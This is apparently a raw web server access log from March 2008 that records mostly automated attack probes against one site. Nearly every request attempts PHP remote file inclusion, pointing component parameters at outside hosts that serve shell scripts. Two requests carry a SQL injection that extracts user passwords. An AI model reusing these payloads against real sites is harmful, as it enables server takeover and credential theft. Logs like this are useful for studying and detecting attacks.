87.118.102.153 - - [04/Mar/2008:09:21:38 -0800] "GET /logs/index.php?option=com_color&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
81.13.86.150 - - [04/Mar/2008:09:21:40 -0800] "GET /appserv/main.php?appserv_root=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.129.229 - - [04/Mar/2008:09:21:41 -0800] "GET /logs/access_080119.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:22:19 -0800] "GET //class.mysql.php?path_to_bt_dir=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:22:19 -0800] "GET /logs//class.mysql.php?path_to_bt_dir=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
65.98.58.250 - - [04/Mar/2008:09:22:26 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.98.58.250 - - [04/Mar/2008:09:22:27 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.98.58.250 - - [04/Mar/2008:09:22:27 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
65.98.58.250 - - [04/Mar/2008:09:22:30 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.98.58.250 - - [04/Mar/2008:09:22:31 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
65.98.58.250 - - [04/Mar/2008:09:22:32 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.roxowner.110mb.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:22:51 -0800] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:22:51 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:22:57 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:23:06 -0800] "GET /logs/access_080221.log/components/com_performs/performs.php?mosConfig_absolute_path=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:23:07 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.100.219.165 - - [04/Mar/2008:09:23:07 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://togot.us/cmdmic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
189.19.5.161 - - [04/Mar/2008:09:23:09 -0800] "GET /logs/access_080122.log//component/option/com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://servicesbrazil.net/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:23:41 -0800] "GET /logs/access_080216.log//components/com_smf/smf.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:23:41 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [04/Mar/2008:09:23:41 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.29.10.40 - - [04/Mar/2008:09:23:50 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:24:44 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.1.171.100 - - [04/Mar/2008:09:25:19 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.obz.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
189.1.171.100 - - [04/Mar/2008:09:25:19 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.obz.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:09:25:29 -0800] "GET /logs/access_080211.log/rconfig.inc.php?config[root_dir]=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:09:25:29 -0800] "GET /logs/rconfig.inc.php?config[root_dir]=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.44.108 - - [04/Mar/2008:09:25:38 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.75 - - [04/Mar/2008:09:25:39 -0800] "GET /logs/access_080119.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
78.108.155.178 - - [04/Mar/2008:09:25:47 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.108.155.178 - - [04/Mar/2008:09:25:47 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.108.155.178 - - [04/Mar/2008:09:25:48 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.108.155.178 - - [04/Mar/2008:09:25:49 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.uwgnh.org//tsep/include/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.35.39.129 - - [04/Mar/2008:09:25:54 -0800] "GET /logs/access_080207.log/rconfig.inc.php?config[root_dir]=http://kgny.us/files/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:09:26:35 -0800] "GET /logs/access_080119.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.162.186 - - [04/Mar/2008:09:27:15 -0800] "GET /logs/access_080201.log/signin.php?_AMGconfig[cfg_serverpath]=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.145.197 - - [04/Mar/2008:09:27:48 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
64.34.145.197 - - [04/Mar/2008:09:27:48 -0800] "GET / HTTP/1.0" 200 3078 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.dmulk.com"
71.70.134.227 - - [04/Mar/2008:09:29:38 -0800] "GET /logs/access_080131.log/index.php?body=http://formula.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.150 - - [04/Mar/2008:09:30:03 -0800] "GET /tmp/ HTTP/1.0" 200 2671 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:31:11 -0800] "GET /logs/access.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.25.46 - - [04/Mar/2008:09:31:59 -0800] "GET /tmp/sess_6f37bf0a2baf5a1606a1fbf4c4626dfe HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.179.208 - - [04/Mar/2008:09:32:08 -0800] "GET /bikes/dteel/2008_02_16/?M=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:32:40 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:32:40 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:33:16 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.91 - - [04/Mar/2008:09:33:24 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.58.170 - - [04/Mar/2008:09:34:19 -0800] "GET /logs/access_080211.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.38.22.250 - - [04/Mar/2008:09:35:40 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://reeftastic.com/cart/images/banners/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.239.161.234 - - [04/Mar/2008:09:35:49 -0800] "GET /logs/access_080127.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.41 - - [04/Mar/2008:09:35:57 -0800] "GET /bikes/dteel/2008_02_16/?N=A HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.24.30 - - [04/Mar/2008:09:36:34 -0800] "GET /tmp/sess_d42c0220ad6ea4c29498f3e413e9cfbd HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
89.108.67.91 - - [04/Mar/2008:09:37:22 -0800] "GET /logs/access.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.91 - - [04/Mar/2008:09:37:22 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.91 - - [04/Mar/2008:09:37:23 -0800] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.91 - - [04/Mar/2008:09:37:44 -0800] "GET /logs/access_080221.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.pinkandblackmedia.com/gallery/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.118.170.87 - - [04/Mar/2008:09:39:26 -0800] "GET /logs/access_080117.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [04/Mar/2008:09:39:26 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.118.170.87 - - [04/Mar/2008:09:39:26 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:09:39:27 -0800] "GET /logs//template/Vert/index.php?site_path=%22Portailhttp://www.usa-westen.info/Fotos/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:09:39:28 -0800] "GET //template/Vert/index.php?site_path=%22Portailhttp://www.usa-westen.info/Fotos/save.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:39:37 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:39:37 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:39:37 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.118.170.87 - - [04/Mar/2008:09:40:41 -0800] "GET /logs/access_080211.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.238.165.117 - - [04/Mar/2008:09:41:17 -0800] "GET /logs/access_080121.log//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.bjlfansite.be/site/media/uploads/.../.,/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.165.117 - - [04/Mar/2008:09:41:18 -0800] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.bjlfansite.be/site/media/uploads/.../.,/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.238.165.117 - - [04/Mar/2008:09:41:18 -0800] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.bjlfansite.be/site/media/uploads/.../.,/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.118.170.87 - - [04/Mar/2008:09:41:45 -0800] "GET /logs/access_080122.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.116.6.178 - - [04/Mar/2008:09:41:59 -0800] "GET /logs///components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.indicce.com/images/r57? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
210.118.170.87 - - [04/Mar/2008:09:42:06 -0800] "GET /logs/access_080201.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.86.80.16 - - [04/Mar/2008:09:42:51 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:43:38 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:09:43:38 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:44:09 -0800] "GET /logs/access_080215.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:09:44:13 -0800] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:09:44:17 -0800] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://albinfo.freehostia.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:44:24 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:44:25 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:44:27 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
194.79.75.195 - - [04/Mar/2008:09:44:27 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://gujewear.com/bemarket/goods/qmono/Q-MoNoR6.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:46:45 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.162.134.138 - - [04/Mar/2008:09:46:46 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://aneuk.com/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:09:47:20 -0800] "GET /logs/access_080117.log/index2.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:09:47:20 -0800] "GET /index2.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.189.130 - - [04/Mar/2008:09:47:23 -0800] "GET /logs/index2.php?x=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:07 -0800] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:07 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:07 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:07 -0800] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:07 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:07 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:08 -0800] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:08 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:08 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:08 -0800] "GET /logs/access_080110.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:08 -0800] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
76.74.156.97 - - [04/Mar/2008:09:48:08 -0800] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://190.7.235.5/m??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:09:48:12 -0800] "GET /logs/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.248.96.141 - - [04/Mar/2008:09:48:13 -0800] "GET /index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x4861636B20427920436176616C657261,0x3a,username,0x3a,password),5+from+mos_users/* HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:09:48:51 -0800] "GET /index.php?id=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
75.126.130.198 - - [04/Mar/2008:09:48:51 -0800] "GET /logs/index.php?id=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
